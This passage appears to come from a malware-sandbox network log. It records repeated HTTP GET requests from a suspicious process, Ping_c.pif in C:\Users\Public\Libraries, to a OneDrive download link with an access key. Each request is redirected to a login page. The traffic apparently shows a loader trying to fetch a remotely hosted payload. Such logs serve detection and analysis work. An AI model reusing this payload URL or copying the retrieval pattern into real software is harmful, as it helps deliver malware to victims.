                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:22:59 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-8hd77
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: F1B1F12382214DA4BE617B9ED8F6141E Ref B: BN3EDGE0311 Ref C: 2024-09-21T14:22:58Z
                            Date: Sat, 21 Sep 2024 14:22:58 GMT
                            Connection: close
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            12192.168.2.85353213.107.137.114437348C:\Users\Public\Libraries\Ping_c.pif
                            TimestampBytes transferredDirectionData
                            2024-09-21 14:23:01 UTC213OUTGET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:23:02 UTC1149INHTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928582&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:42CC5kja3Ig=:tpeWVkQRCwPBFaA1FXI8Mrlb3fJr0nnQmV2CFmQcOf0=:F; domain=.live.com; path=/
                            Set-Cookie: xid=33fd330b-b72c-4973-9ac4-2a09e53ce65b&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:43:01 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:23:02 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-hrldf
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 34072E16EBD64E80A0C4C2D2077B58E1 Ref B: BN3EDGE0613 Ref C: 2024-09-21T14:23:01Z
                            Date: Sat, 21 Sep 2024 14:23:02 GMT
                            Connection: close
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            13192.168.2.85353513.107.137.114437348C:\Users\Public\Libraries\Ping_c.pif
                            TimestampBytes transferredDirectionData
                            2024-09-21 14:23:05 UTC213OUTGET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:23:05 UTC1149INHTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928585&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:A/qJ6Eja3Ig=:ovauWLzxFCP0T8JGiwTSaHol49S3hDhweW1qTDpwZtg=:F; domain=.live.com; path=/
                            Set-Cookie: xid=e0b6f1f6-5e86-4b7d-978d-992070061f6f&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:43:05 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:23:05 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7b7c95544b-jsmqf
                            X-ODWebServer: nameastus2946819-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: B6A1DDDB1E0F4DEFB927A2F7F169B792 Ref B: BN3EDGE0208 Ref C: 2024-09-21T14:23:05Z
                            Date: Sat, 21 Sep 2024 14:23:04 GMT
                            Connection: close
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            14192.168.2.85353813.107.137.114437348C:\Users\Public\Libraries\Ping_c.pif
                            TimestampBytes transferredDirectionData
                            2024-09-21 14:23:08 UTC213OUTGET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:23:08 UTC1149INHTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928588&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:CMk/6kja3Ig=:AiRpF2A9u7pQMu/XCfKxtr5AdRaEOVqotdFRsXBoucc=:F; domain=.live.com; path=/
                            Set-Cookie: xid=cc770d85-1142-4438-87aa-594b0e23c5a1&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:43:08 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:23:08 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7b7c95544b-9btt6
                            X-ODWebServer: nameastus2946819-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 6BD4F630B47648B68B40436135F0C6F4 Ref B: BN3EDGE1111 Ref C: 2024-09-21T14:23:08Z
                            Date: Sat, 21 Sep 2024 14:23:07 GMT
                            Connection: close
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            15192.168.2.85354113.107.137.114437348C:\Users\Public\Libraries\Ping_c.pif
                            TimestampBytes transferredDirectionData
                            2024-09-21 14:23:11 UTC213OUTGET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:23:11 UTC1149INHTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928591&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:ACMg7Eja3Ig=:ofBDg7yqdw6m1a6aGfNn+zY0Ej+3F8DhQXRWdtc9Vd4=:F; domain=.live.com; path=/
                            Set-Cookie: xid=5339415f-8ef4-4705-bfff-19fe496bd5bb&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:43:11 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:23:11 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-w2dr2
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: B8031F3871D24FD29FAAA21DF98EF5CD Ref B: BN3EDGE0919 Ref C: 2024-09-21T14:23:11Z
                            Date: Sat, 21 Sep 2024 14:23:11 GMT
                            Connection: close
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            16192.168.2.85354413.107.137.114437348C:\Users\Public\Libraries\Ping_c.pif
                            TimestampBytes transferredDirectionData
                            2024-09-21 14:23:14 UTC213OUTGET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:23:15 UTC1149INHTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928594&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:Sqsw7kja3Ig=:4JHsAmhelhsBC+kTkzwBO1NIoiYJUW+PTvIwrPwo2iw=:F; domain=.live.com; path=/
                            Set-Cookie: xid=b7ce59a7-d2ff-4e27-8a20-0c59440a95f5&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:43:14 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:23:14 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-cwb7f
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: D3926EA636BC409EB462764B4D1CB22C Ref B: BN3EDGE0218 Ref C: 2024-09-21T14:23:14Z
                            Date: Sat, 21 Sep 2024 14:23:14 GMT
                            Connection: close
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            17192.168.2.85354713.107.137.114437348C:\Users\Public\Libraries\Ping_c.pif
                            TimestampBytes transferredDirectionData
                            2024-09-21 14:23:17 UTC213OUTGET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:23:18 UTC1149INHTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928598&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:dacN8Eja3Ig=:RLR9fpAwlulnuVN4+gC3dlI+XGhSWFQiOGGyzGazIzI=:F; domain=.live.com; path=/
                            Set-Cookie: xid=b5c3aec8-960b-4e21-baa2-5582636e91a6&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:43:17 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:23:18 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-nj9k4
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 4110DA2041544DB2BC2CB7D65DCC9EAF Ref B: BN3EDGE0604 Ref C: 2024-09-21T14:23:17Z
                            Date: Sat, 21 Sep 2024 14:23:18 GMT
                            Connection: close
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            18192.168.2.85355013.107.137.114437348C:\Users\Public\Libraries\Ping_c.pif
                            TimestampBytes transferredDirectionData
                            2024-09-21 14:23:21 UTC213OUTGET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:23:22 UTC1149INHTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928602&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:8/lO8kja3Ig=:ESgwCXp8xvvb17QKRf912LXwSH+4TmOVvqFjgg+DuRs=:F; domain=.live.com; path=/
                            Set-Cookie: xid=8bd5a113-a0aa-4bc3-816a-ea711fb4472a&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:43:21 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:23:22 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-h6wpj
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 991E912308C849C0A1C7D94BD06F9C9F Ref B: BN3EDGE0207 Ref C: 2024-09-21T14:23:21Z
                            Date: Sat, 21 Sep 2024 14:23:22 GMT
                            Connection: close
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            19192.168.2.85355313.107.137.114437348C:\Users\Public\Libraries\Ping_c.pif
                            TimestampBytes transferredDirectionData
                            2024-09-21 14:23:25 UTC213OUTGET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:23:25 UTC1149INHTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928605&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:og1S9Eja3Ig=:I1Xssh1RvDD4wD2aY9gvzPyLIrH+KSDLR9PLRW1eWfk=:F; domain=.live.com; path=/
                            Set-Cookie: xid=b47cd338-bcf5-4244-b1ad-dec9d44f1a30&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:43:25 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:23:25 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-ttwxg
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: C20E5A6DF8484E25BDAE29B6710EF164 Ref B: BN3EDGE0911 Ref C: 2024-09-21T14:23:25Z
                            Date: Sat, 21 Sep 2024 14:23:25 GMT
                            Connection: close
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            20192.168.2.85355813.107.137.114437348C:\Users\Public\Libraries\Ping_c.pif
                            TimestampBytes transferredDirectionData
                            2024-09-21 14:23:28 UTC213OUTGET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:23:29 UTC1149INHTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928609&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:Ew2Z9kja3Ig=:VSGT8Ms3UcFCK/aI6gONL1oWBvGt2omz55IsdQIfMKQ=:F; domain=.live.com; path=/
                            Set-Cookie: xid=9f7582a6-0065-49c9-8637-e253cb28a247&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:43:28 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:23:29 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-rd44p
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 909B2870046846F8BEB91EFDF45B27E9 Ref B: BN3EDGE1011 Ref C: 2024-09-21T14:23:28Z
                            Date: Sat, 21 Sep 2024 14:23:28 GMT
                            Connection: close
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            21192.168.2.85356113.107.137.114437348C:\Users\Public\Libraries\Ping_c.pif
                            TimestampBytes transferredDirectionData
                            2024-09-21 14:23:32 UTC213OUTGET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:23:32 UTC1149INHTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928612&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:OPm7+Eja3Ig=:D7eeTXFcUUsLtiSfVl247WUGRz1gjs1jH4HaY1VCAyA=:F; domain=.live.com; path=/
                            Set-Cookie: xid=1dfa1f20-1b63-4d4c-a5f6-e45d46aea13c&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:43:32 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:23:32 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7b7c95544b-9m949
                            X-ODWebServer: nameastus2946819-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: A0A7E95071E54D1A8703E05DE4C7F421 Ref B: BN3EDGE1118 Ref C: 2024-09-21T14:23:32Z
                            Date: Sat, 21 Sep 2024 14:23:32 GMT
                            Connection: close
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            22192.168.2.85356413.107.137.114437348C:\Users\Public\Libraries\Ping_c.pif
                            TimestampBytes transferredDirectionData
                            2024-09-21 14:23:35 UTC213OUTGET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:23:36 UTC1149INHTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928616&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:bFS1+kja3Ig=:RZhUVSKctKXfr+QWtRIypQjz6xqSojbyQdnwg7PjsIs=:F; domain=.live.com; path=/
                            Set-Cookie: xid=4e9f660a-37ee-4654-aa34-af59dcf9c38a&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:43:35 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:23:36 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-p5mf5
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 76595A1E2EF94096AA041EBEA410C656 Ref B: BN3EDGE0810 Ref C: 2024-09-21T14:23:35Z
                            Date: Sat, 21 Sep 2024 14:23:35 GMT
                            Connection: close
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            23192.168.2.85356713.107.137.114437348C:\Users\Public\Libraries\Ping_c.pif
                            TimestampBytes transferredDirectionData
                            2024-09-21 14:23:39 UTC213OUTGET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:23:39 UTC1149INHTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928619&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:xi/X/Eja3Ig=:01XWhZHWcjv/dbl69k1Pff63QJLpqWD2mQfUvPqYdH8=:F; domain=.live.com; path=/
                            Set-Cookie: xid=d9057863-5a9f-415a-aaad-7c524f2d57db&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:43:39 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:23:39 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7b7c95544b-x8mpg
                            X-ODWebServer: nameastus2946819-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: A08A5A96E48049E89EEC9308F5083A37 Ref B: BN3EDGE0808 Ref C: 2024-09-21T14:23:39Z
                            Date: Sat, 21 Sep 2024 14:23:39 GMT
                            Connection: close
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            24192.168.2.85357013.107.137.114437348C:\Users\Public\Libraries\Ping_c.pif
                            TimestampBytes transferredDirectionData
                            2024-09-21 14:23:42 UTC213OUTGET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:23:43 UTC1149INHTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928623&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:cgfq/kja3Ig=:bftqD88IYRFy1MZ1KnKM+oCV7BsRovrxXK7F4zMuopA=:F; domain=.live.com; path=/
                            Set-Cookie: xid=e1ce4174-5400-4eae-a8a2-3d9a7fb921ee&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:43:42 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:23:43 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-8rz6f
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 8320DCE1D295439B96D3CD2782BDEDA0 Ref B: BN3EDGE0710 Ref C: 2024-09-21T14:23:42Z
                            Date: Sat, 21 Sep 2024 14:23:42 GMT
                            Connection: close
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            25192.168.2.85357313.107.137.114437348C:\Users\Public\Libraries\Ping_c.pif
                            TimestampBytes transferredDirectionData
                            2024-09-21 14:23:46 UTC213OUTGET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:23:46 UTC1149INHTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928626&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:/gveAEna3Ig=:YiTGIo8oC/LQV7INpmh6ZP+hc4ZZhAMROmPGIuNWryM=:F; domain=.live.com; path=/
                            Set-Cookie: xid=9168f77b-554a-4e62-918d-ef59f910c0e5&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:43:46 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:23:46 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-bbfgc
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 7DC74BC4099B4137BDDD07BB510C8AD8 Ref B: BN3EDGE0822 Ref C: 2024-09-21T14:23:46Z
                            Date: Sat, 21 Sep 2024 14:23:45 GMT
                            Connection: close
                            Content-Length: 0


